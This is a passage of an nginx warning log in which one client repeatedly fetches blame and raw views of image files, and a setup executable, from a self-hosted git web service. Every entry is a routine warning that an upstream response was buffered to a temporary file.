"https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom6.png" +2026/02/17 14:08:14 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/18/0000014189 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom5.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom5.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom5.png" +2026/02/17 14:08:22 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/19/0000014190 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/index.html" +2026/02/17 14:08:32 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/19/0000014191 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom2.png" +2026/02/17 14:08:39 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/19/0000014192 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom4.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom4.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom4.png" +2026/02/17 14:08:42 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/19/0000014193 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom2.png" +2026/02/17 14:11:10 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/19/0000014194 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/nos_setup.exe HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/nos_setup.exe", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/nos_setup.exe" +2026/02/17 14:11:46 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/19/0000014195 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/nos_setup.exe HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/nos_setup.exe", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/nos_setup.exe" +2026/02/17 14:12:16 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/19/0000014196 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/nos_setup.exe HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/nos_setup.exe", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/nos_setup.exe" +2026/02/17 14:12:50 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/19/0000014197 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom2.png" +2026/02/17 14:12:58 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/19/0000014198 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom6.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom6.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom6.png" +2026/02/17 14:13:04 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/19/0000014199 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom4.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom4.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom4.png" +2026/02/17 14:13:10 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/20/0000014200 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom5.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom5.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom5.png" +2026/02/17 14:13:18 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/20/0000014201 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom3.png" +2026/02/17 14:13:26 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/20/0000014202 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom1.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom1.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom1.png" +2026/02/17 14:13:29 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/20/0000014203 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom2.png" +2026/02/17 14:13:46 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/20/0000014204 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom2.png" +2026/02/17 14:13:58 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/20/0000014205 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom4.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom4.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom4.png" +2026/02/17 14:14:10 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/20/0000014206 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom1.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom1.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom1.png" +2026/02/17 14:14:17 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/20/0000014207 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom1.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom1.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom1.png" +2026/02/17 14:14:24 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/20/0000014208 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom1.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom1.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom1.png" +2026/02/17 14:14:30 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/20/0000014209 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom5.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom5.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom5.png" +2026/02/17 14:14:37 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/21/0000014210 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom6.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom6.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom6.png" +2026/02/17 14:14:46 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/21/0000014211 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom4.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom4.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom4.png" +2026/02/17 14:14:49 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/21/0000014212 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/index.html" +2026/02/17 14:14:49 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/21/0000014213 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/index.html" +2026/02/17 14:14:56 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/21/0000014214 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom6.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom6.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom6.png" +2026/02/17 14:15:04 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/21/0000014215 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom4.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom4.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom4.png" +2026/02/17 14:15:07 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/21/0000014216 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom3.png" +2026/02/17 14:15:12 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/21/0000014217 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom5.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom5.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom5.png" +2026/02/17 14:15:20 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/21/0000014218 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom3.png" +2026/02/17 14:15:29 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/21/0000014219 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom3.png" +2026/02/17 14:15:32 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/22/0000014220 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom2.png" +2026/02/17 14:15:38 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/22/0000014221 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom6.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom6.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom6.png" +2026/02/17 14:15:40 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/22/0000014222 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/index.html" +2026/02/17 14:15:41 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/22/0000014223 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom2.png" +2026/02/17 14:15:48 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/22/0000014224 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom2.png" +2026/02/17 14:15:55 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/22/0000014225 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom3.png" +2026/02/17 14:16:03 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/22/0000014226 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom6.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom6.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom6.png" +2026/02/17 14:16:07 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/22/0000014227 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom2.png" +2026/02/17 14:16:12 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/22/0000014228 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom4.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom4.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom4.png" +2026/02/17 14:16:19 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/22/0000014229 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom1.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom1.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom1.png" +2026/02/17 14:16:27 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/23/0000014230 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: 